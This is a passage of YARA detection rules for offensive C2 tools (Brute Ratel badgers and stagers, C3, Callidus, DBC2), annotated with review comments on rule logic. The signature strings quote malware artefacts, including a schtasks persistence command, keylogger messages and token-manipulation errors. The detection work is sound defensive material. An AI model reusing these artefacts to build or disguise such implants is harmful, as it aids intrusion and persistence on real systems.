        sha256_1 = "8be0f684decfa6e675d9c9b38590222139b088fa236651b73d1a01f5994a7666"
        sha256_2 = "f7486405bd4ebfc2acf96c54202f536079bcbfc68b339550333bbed0ad03825c"
    strings:
        $s1 = "AYAXZYPAQH" ascii fullword
        $s2 = "AWAVAUATM" ascii fullword
        $s3 = "&.fm#a:dAXQRAPAQL" ascii fullword
        $s4 = "~AZV_gPPs&fZv" ascii fullword
        $s5 = "OrDnmSl" ascii fullword
        $s6 = "Onnn\"-" ascii fullword
        $s7 = "xDAX!X" ascii fullword
        $s8 = "RWaBcGu" ascii fullword
        $s9 = "1zpfd?" ascii fullword
        $s10 = "vUdc7TN" ascii fullword
        $s11 = "vQkR~oN' " ascii fullword
        $s12 = "x/sGxaW'O" ascii fullword
        $s13 = "tNwRf-'" ascii fullword
        $s14 = "fQBS\"W" ascii fullword
        $s15 = "LTEU0AA" ascii fullword
        $s16 = "s-.RBA@K" ascii fullword
        $s17 = "Gwsl\\U:p" ascii fullword
        $s18 = "75.yHG" ascii fullword
        $s19 = "SAHW&Nm" ascii fullword
        $s20 = "+uCLL't~Y_$(iW" ascii fullword
        $s21 = ";=%i3ta" ascii fullword
        $s22 = "X>,%S3x" ascii fullword
        $s23 = "hVIz)0a" ascii fullword
        $s24 = "uWrB~MB*vi=" ascii fullword
        $s25 = "aAkXv&Z" ascii fullword
        $s27 = "EnZl5%*" ascii fullword
        $s28 = "wsbnuob%" ascii fullword
    condition:
        hash.sha256(0, filesize) == "8be0f684decfa6e675d9c9b38590222139b088fa236651b73d1a01f5994a7666"
        or hash.sha256(0, filesize) == "f7486405bd4ebfc2acf96c54202f536079bcbfc68b339550333bbed0ad03825c"
        or (
            math.entropy(0, filesize) >= 7
            and uint16(0) == 0x8348
            and filesize < 700KB
            and 8 of them
        )
}
|
import "pe"
import "math"
import "hash"

// BruteRatel - badger_x86.dll.
// $s2/$s3/$s5/$s7 are MinGW pseudo-relocation runtime messages (present in any
// MinGW-built binary); $s1 looks like a randomised export name and the
// remaining short strings are fragments of the high-entropy payload, so they
// are tied to these two samples. The non-hash branch thus rests mainly on
// whole-file entropy >= 7 plus GetNativeSystemInfo/VirtualProtect imports in a
// DLL under 700KB. hash.sha256 is the leftmost operand and is computed over
// every scanned file before the cheap checks.
rule BruteRatel_BadgerDll_x86 {
    meta:
        description = "BruteRatel - badger_x86.dll"
        sha256_1 = "434a0fa442b1322e654142fe6a8bc35df3bcdebacb030ba68c4644f96df5caac"
        sha256_2 = "a38370ca0d2421369f30c1bd83cc5a7d393ba86ee16ae277aab2008374e7b278"
    strings:
        $s1 = "F5M5INBS.dll" ascii fullword
        $s2 = " VirtualQuery failed for %d bytes at address %p" ascii fullword
        $s3 = "%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p." ascii fullword
        $s4 = "4!535?5f5{5" ascii fullword
        $s5 = " VirtualProtect failed with code 0x%x" ascii fullword
        $s6 = "cH:\"+SY" ascii fullword
        $s7 = " Unknown pseudo relocation protocol version %d." ascii fullword
        $s8 = "TaNnOhb" ascii fullword
        $s9 = ")warvr6f" ascii fullword
        $s10 = "3;WiFF!S" ascii fullword
        $s11 = "VMbw`iC)" ascii fullword
        $s12 = "HvbS29@~\\A" ascii fullword
        $s13 = "WkCox*V%" ascii fullword
        $s14 = "WbkiPR%" ascii fullword
        $s15 = "ywTl=lQu" ascii fullword
        $s16 = "RCyDgt/" ascii fullword
        $s17 = "_SGimRpH" ascii fullword
        $s18 = "Gypy?#W" ascii fullword
        $s19 = "rKNW\\$D" ascii fullword
        $s20 = "QGTZx.\"" ascii fullword
        $s21 = "/ird_%k%vy?" ascii fullword
        $s22 = "zbMDO01" ascii fullword
        $s23 = "]Xbych4o" ascii fullword
        $s24 = "TNUu!E <" ascii fullword
        $s25 = "vSpZ3A3" ascii fullword
        $s26 = "stXi}G<" ascii fullword
        $s27 = "gkms\\#" ascii fullword
        $s28 = "V\\bhaV!" ascii fullword
        $s29 = "ZrJqHBf`" ascii fullword
    condition:
        hash.sha256(0, filesize) == "434a0fa442b1322e654142fe6a8bc35df3bcdebacb030ba68c4644f96df5caac"
        or hash.sha256(0, filesize) == "a38370ca0d2421369f30c1bd83cc5a7d393ba86ee16ae277aab2008374e7b278"
        or (
            math.entropy(0, filesize) >= 7
            and pe.imports("kernel32.dll", "GetNativeSystemInfo")
            and pe.imports("kernel32.dll", "VirtualProtect")
            and pe.characteristics & pe.DLL
            and uint16(0) == 0x5a4d
            and filesize < 700KB
            and 8 of them
        )
}
|
import "math"
import "hash"

// BruteRatel - badger_x86_RtlExitUserThread.bin (raw x86 shellcode).
// Entry check uint16(0) == 0xe483 = leading bytes 83 E4 (an and-esp style
// stack alignment, inferred from the byte values). All strings are short
// fragments of the encrypted payload and only recur in the two listed samples,
// so outside the hash branch the rule is effectively "entropy >= 7 blob under
// 600KB with this entry byte pair". hash.sha256 is the leftmost operand and is
// computed over every scanned file before the cheap checks.
rule BruteRatel_BadgerBin_x86_RtlExitUserThread {
    meta:
        description = "BruteRatel - badger_x86_RtlExitUserThread.bin"
        sha256_1 = "b25288c94464546446ee1f9d3b361f979895392219b4316645945dbb6ed045b9"
        sha256_2 = "144e66ef1ae2d6ec012ee88164141ed386b3240e0876ff63500203b665236511"
    strings:
        $s1 = "QT^%U%" ascii fullword
        $s2 = "nrWLO0J" ascii fullword
        $s3 = "RnPvIe_s" ascii fullword
        $s4 = "aHOcIO0A" ascii fullword
        $s5 = "hIHj\\4" ascii fullword
        $s6 = "TPfI/BA" ascii fullword
        $s7 = "XzJz\"D" ascii fullword
        $s8 = "wUjnc\\" ascii fullword
        $s9 = "yIaAkD{u" ascii fullword
        $s10 = "UtBn_(U&" ascii fullword
        $s11 = "uMeUH}Wc;" ascii fullword
        $s12 = "xRTPi\\" ascii fullword
        $s13 = "1OUhr!!" ascii fullword
        $s14 = "uNrKkND;" ascii fullword
        $s15 = "Lxua?iD" ascii fullword
        $s16 = "rWWKd2Vi" ascii fullword
        $s17 = "5pvQWR4*" ascii fullword
        $s18 = "NgyeM?" ascii fullword
        $s19 = "]xlxA?" ascii fullword
        $s20 = "UEfP<yP" ascii fullword
        $s21 = "- c7;;" ascii fullword
        $s22 = "2%Bm%0" ascii fullword
        $s23 = "P63%]%i~" ascii fullword
        $s24 = "zYvxRjs" ascii fullword
        $s25 = "zhCse%y" ascii fullword
        $s26 = "Ijlb^Ps" ascii fullword
        $s27 = "inYh~q0C" ascii fullword
        $s28 = "raigP]`" ascii fullword
        $s29 = "oIKjIr;_|" ascii fullword
    condition:
        hash.sha256(0, filesize) == "b25288c94464546446ee1f9d3b361f979895392219b4316645945dbb6ed045b9"
        or hash.sha256(0, filesize) == "144e66ef1ae2d6ec012ee88164141ed386b3240e0876ff63500203b665236511"
        or (
            math.entropy(0, filesize) >= 7
            and uint16(0) == 0xe483
            and filesize < 600KB
            and 8 of them
        )
}
|
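import "pe"
import "math"
import "hash"

// BruteRatel - badger_x86_service.exe (service-wrapped x86 badger).
// $s1/$s6 are halves of a decoy service description and $s7 the service name
// it registers under - host-side hunting pivots, presumably; the advapi32
// service-control imports in the condition match that packaging.
// $s2/$s3/$s5/$s8 are MinGW pseudo-relocation runtime messages (generic); the
// short high-entropy strings are payload fragments tied to these two samples.
// $s1 has no modifiers because it is a 128-char truncation.
// Fix: the original declared the "Manages universal application..." string
// as both $s1 and $s4, double-counting one hit toward "8 of them"; the
// duplicate $s4 is dropped.
// hash.sha256 is the leftmost operand and is computed over every scanned file.
rule BruteRatel_BadgerService_x86 {
    meta:
        description = "BruteRatel - badger_x86_service.exe"
        sha256_1 = "ac99a80277cd93f35df6a962fb13fe807a28328433e5d1d8765a13e9bc9562cc"
        sha256_2 = "385c2e83b1f84acd9418c6cfaed52adc943d5b768ebe8dc731a73adf7edaa3a4"
    strings:
        $s1 = "Manages universal application core process that in Windows 8 and continues in Windows 10. It is used to determine whether univer"
        $s2 = " VirtualQuery failed for %d bytes at address %p" ascii fullword
        $s3 = "%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p." ascii fullword
        $s5 = " VirtualProtect failed with code 0x%x" ascii fullword
        $s6 = "tion or microphone. It helps to transact records of your universal apps with the trust and privacy settings of user." ascii fullword
        $s7 = "TransactionBrokerService" ascii fullword
        $s8 = " Unknown pseudo relocation protocol version %d." ascii fullword
        $s9 = "'tSAc?" ascii fullword
        $s10 = "adME<2B" ascii fullword
        $s11 = "EtWnPlR@*" ascii fullword
        $s12 = "xA]%d$" ascii fullword
        $s13 = "bTIlD:L" ascii fullword
        $s14 = "eldi.#]" ascii fullword
        $s15 = "wglk!@" ascii fullword
        $s16 = "WLiF*q:" ascii fullword
        $s17 = "YypyU`C" ascii fullword
        $s18 = ")lXxY| 2" ascii fullword
        $s19 = "ODVYo{# #" ascii fullword
        $s20 = "qWTLG$i" ascii fullword
        $s21 = "}%EP%VJ|D" ascii fullword
        $s22 = "wOCo*.|j\\" ascii fullword
    condition:
        hash.sha256(0, filesize) == "ac99a80277cd93f35df6a962fb13fe807a28328433e5d1d8765a13e9bc9562cc"
        or hash.sha256(0, filesize) == "385c2e83b1f84acd9418c6cfaed52adc943d5b768ebe8dc731a73adf7edaa3a4"
        or (
            math.entropy(0, filesize) >= 7
            and pe.imports("kernel32.dll", "GetNativeSystemInfo")
            and pe.imports("kernel32.dll", "VirtualProtect")
            and pe.imports("advapi32.dll", "ChangeServiceConfig2A")
            and pe.imports("advapi32.dll", "ChangeServiceConfigA")
            and pe.imports("advapi32.dll", "StartServiceCtrlDispatcherA")
            and pe.characteristics & pe.EXECUTABLE_IMAGE
            and uint16(0) == 0x5a4d
            and filesize < 700KB
            and 8 of them
        )
}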
|
import "math"
import "hash"

// BruteRatel - badger_x86_WaitForSingleObject.bin (raw x86 shellcode).
// Entry check uint16(0) == 0xe483 = leading bytes 83 E4 (inferred: an and-esp
// style stack alignment). All strings are short fragments of the encrypted
// payload and only recur in the two listed samples, so outside the hash branch
// the rule is effectively "entropy >= 7 blob under 600KB with this entry byte
// pair". hash.sha256 is the leftmost operand and is computed over every
// scanned file before the cheap checks.
rule BruteRatel_BadgerBin_x86_WaitForSingleObject {
    meta:
        description = "BruteRatel - badger_x86_WaitForSingleObject.bin"
        sha256_1 = "34f4c3c83c8f700980f464f4f0b17e651c32dd2468fa93d6be65feccdefcb9d7"
        sha256_2 = "32aa5df260b711119b95cd5e3b31464174c4e75388f8ef65976f77a3c2bfcfa1"
    strings:
        $s1 = "u.Scg$]" ascii fullword
        $s2 = "VeUye?^(" ascii fullword
        $s3 = "vlHSYN;" ascii fullword
        $s4 = "VcOmK{" ascii fullword
        $s5 = "vKUEFs&" ascii fullword
        $s6 = "{wBwW6)h" ascii fullword
        $s7 = "RfCI\"C" ascii fullword
        $s8 = "XJ\"iFHoMUme6" ascii fullword
        $s9 = "vFarpxD" ascii fullword
        $s10 = "MvNt,OG@" ascii fullword
        $s11 = "DVQhcvq6 (" ascii fullword
        $s12 = "PsBWhs+" ascii fullword
        $s13 = "wU.FbR" ascii fullword
        $s14 = "rhTBPuq." ascii fullword
        $s15 = "mZatBjy" ascii fullword
        $s16 = ";Nzfpr:AP" ascii fullword
        $s17 = "%.Enb{$" ascii fullword
        $s18 = "lXLrko/dVtQ7" ascii fullword
        $s19 = ":(7.TNH" ascii fullword
        $s20 = "KXny@10" ascii fullword
        $s21 = "{Oc.qfy^" ascii fullword
        $s22 = "bqFBo$\\l)" ascii fullword
        $s23 = "SrtTo\"W=" ascii fullword
        $s24 = "ECNRNIMpWE" ascii fullword
        $s25 = "a{ZNYW75:;z" ascii fullword
        $s26 = "jwsW\\_6U" ascii fullword
        $s27 = "HdXdw]m!" ascii fullword
        $s28 = "@WBvXXJ?" ascii fullword
    condition:
        hash.sha256(0, filesize) == "34f4c3c83c8f700980f464f4f0b17e651c32dd2468fa93d6be65feccdefcb9d7"
        or hash.sha256(0, filesize) == "32aa5df260b711119b95cd5e3b31464174c4e75388f8ef65976f77a3c2bfcfa1"
        or (
            math.entropy(0, filesize) >= 7
            and uint16(0) == 0xe483
            and filesize < 600KB
            and 8 of them
        )
}
|
import "hash"

// BruteRatel - syscall_stage_x64_RtlExitUserThread.bin (small x64 stager).
// $s1/$s5/$s9 look like pieces of a JSON body ("auth", "arch", "cds") with
// trailing instruction bytes that happen to be printable, and $s2-$s4/$s6 read
// as ASCII of x64 push-register sequences; the hex strings $s11-$s15 are
// function prologues (55 48 89 E5 = push rbp; mov rbp, rsp; then callee-saved
// pushes) - all inferred from the byte values. Entry check uint16(0) == 0x8348
// = leading bytes 48 83. The non-hash branch demands ALL strings, so it is
// tight; the same string set is shared with the WaitForSingleObject variant.
// hash.sha256 is the leftmost operand and is computed over every scanned file.
rule BruteRatel_SyscallStageBin_x64_RtlExitUserThread {
    meta:
        description = "BruteRatel - syscall_stage_x64_RtlExitUserThread.bin"
        sha256 = "596a12d0c792569148bf5404d3074ba4fe0fff0f14f48f3244463d0d7a83f5ca"
    strings:
        $s1 = ":{\"auth\"L" ascii fullword
        $s2 = "AWAVAUATM" ascii fullword
        $s3 = "AWAVAUM" ascii fullword
        $s4 = "AWAVAUATI" ascii fullword
        $s5 = "{\"arch\":UH" ascii fullword
        $s6 = "AUATE1" ascii fullword
        $s7 = "PMch<H" ascii fullword
        $s8 = "McT$<L" ascii fullword
        $s9 = "64,\"cds\"H" ascii fullword
        $s10 = "n.\\d}#l$YH" ascii fullword
        $s11 = { 55 48 89 E5 41 57 41 56 41 55 41 54 4D 89 C4 57 }
        $s12 = { 55 48 89 E5 41 57 41 56 41 55 4D 89 C5 41 54 57 }
        $s13 = { 55 48 89 E5 57 56 53 48 89 CB 48 83 E4 F0 48 81 }
        $s14 = { 55 48 89 E5 41 57 41 56 41 55 41 54 49 89 D4 BA }
        $s15 = { 55 48 89 E5 41 55 41 54 57 56 53 48 83 E4 F0 48 }
    condition:
        hash.sha256(0, filesize) == "596a12d0c792569148bf5404d3074ba4fe0fff0f14f48f3244463d0d7a83f5ca"
        or (
            uint16(0) == 0x8348
            and filesize < 30KB
            and all of them
        )
}
|
import "hash"

// BruteRatel - syscall_stage_x64_WaitForSingleObject.bin (small x64 stager).
// String set is identical to the RtlExitUserThread variant: JSON-body pieces
// ("auth", "arch", "cds") with trailing printable opcode bytes, ASCII views of
// x64 push-register sequences, and five hex function prologues starting
// 55 48 89 E5 (push rbp; mov rbp, rsp) - inferred from the byte values. Only
// the sample hash differs, so a combined rule with both hashes would behave
// the same. Entry check uint16(0) == 0x8348 = leading bytes 48 83; the
// non-hash branch demands ALL strings. hash.sha256 is the leftmost operand
// and is computed over every scanned file.
rule BruteRatel_SyscallStageBin_x64_WaitForSingleObject {
    meta:
        description = "BruteRatel - syscall_stage_x64_WaitForSingleObject.bin"
        sha256 = "2c24d72cf36f0abf83faa2d0fdd6728ed945ba9d0e9f787e98d8f25d07f1f384"
    strings:
        $s1 = ":{\"auth\"L" ascii fullword
        $s2 = "AWAVAUATM" ascii fullword
        $s3 = "AWAVAUM" ascii fullword
        $s4 = "AWAVAUATI" ascii fullword
        $s5 = "{\"arch\":UH" ascii fullword
        $s6 = "AUATE1" ascii fullword
        $s7 = "PMch<H" ascii fullword
        $s8 = "McT$<L" ascii fullword
        $s9 = "64,\"cds\"H" ascii fullword
        $s10 = "n.\\d}#l$YH" ascii fullword
        $s11 = { 55 48 89 E5 41 57 41 56 41 55 41 54 4D 89 C4 57 }
        $s12 = { 55 48 89 E5 41 57 41 56 41 55 4D 89 C5 41 54 57 }
        $s13 = { 55 48 89 E5 57 56 53 48 89 CB 48 83 E4 F0 48 81 }
        $s14 = { 55 48 89 E5 41 57 41 56 41 55 41 54 49 89 D4 BA }
        $s15 = { 55 48 89 E5 41 55 41 54 57 56 53 48 83 E4 F0 48 }
    condition:
        hash.sha256(0, filesize) == "2c24d72cf36f0abf83faa2d0fdd6728ed945ba9d0e9f787e98d8f25d07f1f384"
        or (
            uint16(0) == 0x8348
            and filesize < 30KB
            and all of them
        )
}
|
import "hash"

// BruteRatel - syscall_stage_x86_RtlExitUserThread.bin (small x86 stager).
// $s1 and $s3-$s9 look like 4-byte chunks of a JSON/HTTP template written to
// the stack as immediates: the leading "D$" is the ModRM/SIB pair 44 24
// ([esp+disp8]) rendered as ASCII - inferred from the byte values, verify in
// a disassembler. Entry check uint16(0) == 0xe483 = leading bytes 83 E4.
// The non-hash branch demands ALL strings; the set is shared with the
// WaitForSingleObject variant. hash.sha256 is the leftmost operand and is
// computed over every scanned file.
rule BruteRatel_SyscallStageBin_x86_RtlExitUserThread {
    meta:
        description = "BruteRatel - syscall_stage_x86_RtlExitUserThread.bin"
        sha256 = "2b1f466ab2c78bb3f8fd287a7cb3c87922317fe7cd348aa699e57b285544c2a9"
    strings:
        $s1 = "D$`POST" ascii fullword
        $s2 = "@h$p<pu" ascii fullword
        $s3 = "D$ich\":" ascii fullword
        $s4 = "D$yuth\"" ascii fullword
        $s5 = "D$m86,\"" ascii fullword
        $s6 = "D$e{\"ar" ascii fullword
        $s7 = "D$\\\"}}" ascii fullword
        $s8 = "D$u:{\"a" ascii fullword
        $s9 = "D$qcds\"" ascii fullword
        $s10 = "n.\\d}#l$YRQ" ascii fullword
        $s11 = { 55 8B 7C 24 58 03 3B 89 3C 24 E8 97 04 00 00 3B }
    condition:
        hash.sha256(0, filesize) == "2b1f466ab2c78bb3f8fd287a7cb3c87922317fe7cd348aa699e57b285544c2a9"
        or (
            uint16(0) == 0xe483
            and filesize < 20KB
            and all of them
        )
}
|
import "hash"

// BruteRatel - syscall_stage_x86_WaitForSingleObject.bin (small x86 stager).
// Same string set as the RtlExitUserThread x86 variant: stack-built 4-byte
// chunks of a JSON/HTTP template whose [esp+disp8] encoding (44 24) reads as
// "D$", plus one hex code fragment - inferred from the byte values. Only the
// sample hash differs, so a combined rule with both hashes would be
// equivalent. Entry check uint16(0) == 0xe483 = leading bytes 83 E4; the
// non-hash branch demands ALL strings. hash.sha256 is the leftmost operand
// and is computed over every scanned file.
rule BruteRatel_SyscallStageBin_x86_WaitForSingleObject {
    meta:
        description = "BruteRatel - syscall_stage_x86_WaitForSingleObject.bin"
        sha256 = "14912bc7b7f9555231f3145f5ed81dd9776ff40d7a750e0908288406762acf31"
    strings:
        $s1 = "D$`POST" ascii fullword
        $s2 = "@h$p<pu" ascii fullword
        $s3 = "D$ich\":" ascii fullword
        $s4 = "D$yuth\"" ascii fullword
        $s5 = "D$m86,\"" ascii fullword
        $s6 = "D$e{\"ar" ascii fullword
        $s7 = "D$\\\"}}" ascii fullword
        $s8 = "D$u:{\"a" ascii fullword
        $s9 = "D$qcds\"" ascii fullword
        $s10 = "n.\\d}#l$YRQ" ascii fullword
        $s11 = { 55 8B 7C 24 58 03 3B 89 3C 24 E8 97 04 00 00 3B }
    condition:
        hash.sha256(0, filesize) == "14912bc7b7f9555231f3145f5ed81dd9776ff40d7a750e0908288406762acf31"
        or (
            uint16(0) == 0xe483
            and filesize < 20KB
            and all of them
        )
}
|
import "hash"
import "pe"

// C3 - NodeRelayDll_r64.dll / NodeRelayDll_r86.dll.
// Most strings are generic MSVC/STL and nlohmann-json artefacts ($s7-$s9,
// $s11-$s18, $s20) or Windows app-policy API names; the sample-specific
// tokens are the "[x] error ... token" messages ($s4/$s5/$s10) and
// $s19, an HTTP header name presumably tied to one of the relay's channels.
// The discriminating part of the non-hash branch is the import combination
// (token duplication + SystemFunction036 + WinHttp) on a DLL; "8 of them"
// alone would be satisfied by many MSVC binaries. hash.sha256 is the
// leftmost operand and is computed over every scanned file.
rule C3 {
    meta:
        description = "C3 - NodeRelayDll_r64.dll, NodeRelayDll_r86.dll"
        sha256_1 = "ca83ab01d46925f1d3a559affd3398d1cfe5d0abd637413cd5ae25f1fe7bd008"
        sha256_2 = "85bc111b4d83b7fafd4c72832f23ebeadd1a9a74942aab072c928b1fc8b55625"
    strings:
        $s1 = "api-ms-win-core-synch-l1-2-0.dll" wide fullword
        $s2 = "AppPolicyGetProcessTerminationMethod" ascii fullword
        $s3 = " <requestedExecutionLevel level='asInvoker' uiAccess='false' />" ascii fullword
        $s4 = "[x] error creating Token" ascii fullword
        $s5 = "[x] error setting token" ascii fullword
        $s6 = "AppPolicyGetThreadInitializationType" ascii fullword
        $s7 = "invalid vector subscript" ascii fullword
        $s8 = " Type Descriptor'" ascii fullword
        $s9 = ".?AVfilesystem_error@filesystem@std@@" ascii fullword
        $s10 = "[x] error duplicating token" ascii fullword
        $s11 = "directory_iterator::operator++" ascii fullword
        $s12 = "syntax error " ascii fullword
        $s13 = "operator co_await" ascii fullword
        $s14 = "object key" ascii fullword
        $s15 = "operator<=>" ascii fullword
        $s16 = ".data$rs" ascii fullword
        $s17 = "sysrandom" ascii fullword
        $s18 = "parse error: character [" ascii fullword
        $s19 = "X-Atlassian-Token" ascii fullword
        $s20 = ".?AVparse_error@detail@nlohmann@@" ascii fullword
    condition:
        hash.sha256(0, filesize) == "ca83ab01d46925f1d3a559affd3398d1cfe5d0abd637413cd5ae25f1fe7bd008"
        or hash.sha256(0, filesize) == "85bc111b4d83b7fafd4c72832f23ebeadd1a9a74942aab072c928b1fc8b55625"
        or (
            pe.imports("kernel32.dll", "VirtualProtect")
            and pe.imports("kernel32.dll", "FindNextFileW")
            and pe.imports("advapi32.dll", "DuplicateTokenEx")
            and pe.imports("advapi32.dll", "SystemFunction036")
            and pe.imports("winhttp.dll", "WinHttpConnect")
            and pe.imports("winhttp.dll", "WinHttpCrackUrl")
            and pe.characteristics & pe.DLL
            and (
                (uint16(0) == 0x5a4d and filesize < 4000KB and (8 of them))
                or (all of them)
            )
        )
}
|
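import "hash"
import "pe"

// Callidus - OneNoteC2Client.exe / OutlookC2Client.exe (.NET single-file
// apphost launchers).
// Fix: the original declared the meta key "sha256" twice. YARA accepts that,
// but tooling that exposes meta as a key/value map keeps only the last value,
// silently losing one of the two sample hashes; the keys are now sha256_1 /
// sha256_2, consistent with the other rules in this set.
// NOTE(review): every string is stock .NET apphost / single-file bundle text
// and the four imports are standard for that host, so the non-hash branch is
// effectively a ".NET single-file apphost executable under 500KB" detector;
// treat hits as hunting leads, not as a Callidus verdict. hash.sha256 is the
// leftmost operand and is computed over every scanned file.
rule Callidus_EXEs {
    meta:
        description = "Callidus - OneNoteC2Client.exe, OutlookC2Client.exe"
        sha256_1 = "96d0bec95be57bb098632ab49eb8a2f23d3a7c9dc1e288a5fb990fa5ccec1bca"
        sha256_2 = "0860153f607f4536b72d0ee821628077aa4e17f2465a00424b798c9e720505ef"
    strings:
        $s1 = "hostfxr.dll" wide fullword
        $s2 = "--- Invoked %s [version: %s, commit hash: %s] main = {" wide fullword
        $s3 = "This executable is not bound to a managed DLL to execute. The binding value is: '%s'" wide fullword
        $s4 = "F:\\workspace\\_work\\1\\s\\artifacts\\obj\\win-x64.Release\\corehost\\cli\\apphost\\Release\\apphost.pdb" ascii fullword
        $s5 = "The managed DLL bound to this executable is: '%s'" wide fullword
        $s6 = "A fatal error was encountered. This executable was not bound to load a managed DLL." wide fullword
        $s7 = "Extraction completed by another process, aborting current extraction." wide fullword
        $s8 = "Failed to resolve full path of the current executable [%s]" wide fullword
        $s9 = "Failed to remove temporary file [%s]." wide fullword
        $s10 = "Failed to remove temporary directory [%s]." wide fullword
        $s11 = "The managed DLL bound to this executable could not be retrieved from the executable image." wide fullword
        $s12 = " - Installing .NET Core prerequisites might help resolve this problem." wide fullword
        $s13 = "https://go.microsoft.com/fwlink/?linkid=798306" wide fullword
        $s14 = "Bundle header version compatibility check failed" wide fullword
        $s15 = "I/O failure reading contents of the bundle." wide fullword
        $s16 = "Couldn't open host binary for reading contents" wide fullword
        $s17 = "Failed to load the dll from [%s], HRESULT: 0x%X" wide fullword
        $s18 = "The required library %s does not support relative app dll paths." wide fullword
        $s19 = "Failure processing application bundle; possible file corruption." wide fullword
        $s20 = "Failure processing application bundle." wide fullword
    condition:
        hash.sha256(0, filesize) == "96d0bec95be57bb098632ab49eb8a2f23d3a7c9dc1e288a5fb990fa5ccec1bca"
        or hash.sha256(0, filesize) == "0860153f607f4536b72d0ee821628077aa4e17f2465a00424b798c9e720505ef"
        or (
            pe.imports("kernel32.dll", "FindNextFileW")
            and pe.imports("kernel32.dll", "RemoveDirectoryW")
            and pe.imports("kernel32.dll", "TerminateProcess")
            and pe.imports("advapi32.dll", "RegisterEventSourceW")
            and pe.characteristics & pe.EXECUTABLE_IMAGE
            and (
                (uint16(0) == 0x5a4d and filesize < 500KB and (8 of them))
                or (all of them)
            )
        )
}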
|
import "hash"

// Callidus - OneNoteC2Client.dll / OutlookC2Client.dll (managed agent DLLs).
// Strings are .NET metadata names: the agent's own method/lambda names
// ($s1-$s3, $s7-$s11, $s14, $s18) are sample-specific, while the
// framework names ($s4, $s15, $s20) and the Graph API scope ($s6) are shared
// with legitimate Graph clients. No pe module here: the MZ check plus the
// 80KB cap stand in for it. hash.sha256 is the leftmost operand and is
// computed over every scanned file before the cheap checks.
rule Callidus_DLLs {
    meta:
        description = "Callidus - OneNoteC2Client.dll, OutlookC2Client.dll"
        sha256_1 = "066857279d1e93a2ffdb1df8e1d509f6cc58a60083674e842a1e178cf1483904"
        sha256_2 = "4f9e6582ebf1b3d5077d8a94b3696bc71f43984c7672c9eb696868f9dd711bca"
    strings:
        $s1 = "ShellExecuteWithPath" ascii fullword
        $s2 = "<ShellExecuteWithPath>b__1" ascii fullword
        $s3 = "<ShellExecuteWithPath>b__0" ascii fullword
        $s4 = "System.Diagnostics.Process" ascii fullword
        $s5 = "ShellCommand" ascii fullword
        $s6 = "https://graph.microsoft.com/.default" wide fullword
        $s7 = "CallGetWebApiAndProcessResultASync" ascii fullword
        $s8 = "<CallGetWebApiAndProcessResultASync>d__5" ascii fullword
        $s9 = "getuserid" ascii fullword
        $s10 = "<CallGetWebApiAndProcessResultASync>b__5_0" ascii fullword
        $s11 = "CallPostWebApiAndProcessResultASync" ascii fullword
        $s12 = "get_contentType" ascii fullword
        $s13 = "get_content" ascii fullword
        $s14 = "getmessages" ascii fullword
        $s15 = "System.Configuration.ConfigurationManager" ascii fullword
        $s16 = "GetAccountsAsync" ascii fullword
        $s17 = "get_HttpClient" ascii fullword
        $s18 = "CallDeleteWebApiAndProcessResultASync" ascii fullword
        $s19 = "<content>k__BackingField" ascii fullword
        $s20 = "set_UseShellExecute" ascii fullword
    condition:
        hash.sha256(0, filesize) == "066857279d1e93a2ffdb1df8e1d509f6cc58a60083674e842a1e178cf1483904"
        or hash.sha256(0, filesize) == "4f9e6582ebf1b3d5077d8a94b3696bc71f43984c7672c9eb696868f9dd711bca"
        or (
            (uint16(0) == 0x5a4d and filesize < 80KB and (8 of them))
            or (all of them)
        )
}
|
import "hash"
import "pe"

// DBC2 - dbc2Loader.dll (small managed loader).
// $x1 (the loader's own module name) is mandatory in the non-hash branch;
// the "$s" set mixes sample-specific names ($s2, $s3, $s5, $s6, $s10) with
// generic .NET tokens ($s8, $s9, $s11-$s13), so "4 of them" adds little on
// its own - the $x1 requirement and the 10KB cap carry the branch.
// hash.sha256 is the leftmost operand and is computed over every scanned
// file before the cheap checks.
rule DBC2_Loader {
    meta:
        description = "DBC2 - dbc2Loader.dll"
        sha256 = "045312cb098438fe9dbcecf713766bff29d171726fb228de92ef54447564bbb4"
    strings:
        $x1 = "dbc2Loader.dll" wide fullword
        $s2 = "dropboxc2.C2_Agent" wide fullword
        $s3 = "dbc2Loader" ascii fullword
        $s4 = "[ERROR] Missing arguments" wide fullword
        $s5 = "loadDBC2" ascii fullword
        $s6 = "masterKey" ascii fullword
        $s7 = "WebRequest" ascii fullword
        $s8 = "Console" ascii fullword
        $s9 = "source" ascii fullword
        $s10 = "xorKey" ascii fullword
        $s11 = "System.Runtime.CompilerServices" ascii fullword
        $s12 = "System.Reflection" ascii fullword
        $s13 = "System" ascii fullword
    condition:
        hash.sha256(0, filesize) == "045312cb098438fe9dbcecf713766bff29d171726fb228de92ef54447564bbb4"
        or (
            pe.characteristics & pe.DLL
            and uint16(0) == 0x5a4d
            and filesize < 10KB
            and 1 of ($x*)
            and 4 of them
        )
}
|
import "pe"
import "hash"

// DBC2 - dbc2_agent.exe (Dropbox-API-backed agent).
// $x1 (an operator-facing error message) is mandatory in the non-hash branch.
// Beyond file matching, $s7 (AppData path) and $s14 (scheduled-task name in a
// schtasks command line) are host-side persistence artefacts worth hunting
// for in task-creation and file-creation telemetry; the dropboxapi.com URLs
// ($s4, $s9, $s10, $s15-$s17) describe the C2 transport but also occur in
// legitimate Dropbox clients. hash.sha256 is the leftmost operand and is
// computed over every scanned file before the cheap checks.
rule DBC2_Agent {
    meta:
        description = "DBC2 - dbc2_agent.exe"
        sha256 = "ba606da59063a837e704a49b065979ad4ea4b508c8600e520a8c69948332661b"
    strings:
        $x1 = "ERROR - COULD NOT EXECUTE COMMAND:" wide fullword
        $s2 = "ERROR - Could not send key strokes to the process, probably wrong keystrokes sequence" wide fullword
        $s3 = "ERROR - Could not find a process with name " wide fullword
        $s4 = "https://content.dropboxapi.com/2/files/download" wide fullword
        $s5 = "ERROR - COULD NOT EXECUTE: " wide fullword
        $s6 = "OK - KeyLogger started" wide fullword
        $s7 = "%USERPROFILE%\\AppData\\Local\\WindowsUserLogRotate" wide fullword
        $s8 = "dbc2_agent.exe" wide fullword
        $s9 = "https://content.dropboxapi.com/2/files/upload" wide fullword
        $s10 = "https://api.dropboxapi.com/2/files/get_metadata" wide fullword
        $s11 = "OK - PROCESS STARTED: " wide fullword
        $s12 = "OK - Key strokes sent to process " wide fullword
        $s13 = "OK - Clipboard logger started" wide fullword
        $s14 = "schtasks /create /TN 'WindowsUserLogRotate' /TR '" wide fullword
